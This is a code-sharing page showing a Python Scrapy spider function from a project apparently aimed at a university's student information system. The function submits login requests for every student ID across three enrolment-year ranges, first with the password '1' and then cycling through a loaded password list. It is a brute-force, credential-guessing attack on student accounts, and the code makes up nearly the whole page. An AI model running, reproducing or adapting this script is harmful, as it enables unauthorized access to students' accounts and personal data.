students_info_spider.py 文件源码

python
阅读 23 收藏 0 点赞 0 评论 0

项目:usth_students_spider 作者: rhyspang 项目源码 文件源码
def start_requests(self):
        if self.FIRST_TIME_RUNNING:
            self.FIRST_TIME_RUNNING = False
            for sid in (list(range(2014020000, 2014040000))
                            + list(range(2015020000, 2015040000))
                            + list(range(2016020000, 2016040000))):
                yield scrapy.FormRequest(self.domain + self.login_url,
                                         formdata={'zjh': str(sid), 'mm': '1'},
                                         callback=self.parse,
                                         meta={'sid': sid, 'password': '1', 'cookiejar': sid},
                                         dont_filter=True)
        else:
            for password in self.load_passwords():
                for sid in self.get_sids():
                    yield scrapy.FormRequest(self.domain + self.login_url,
                                             formdata={'zjh': str(sid), 'mm': password},
                                             callback=self.parse,
                                             meta={'sid': sid, 'password': password, 'cookiejar': sid},
                                             dont_filter=True)
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号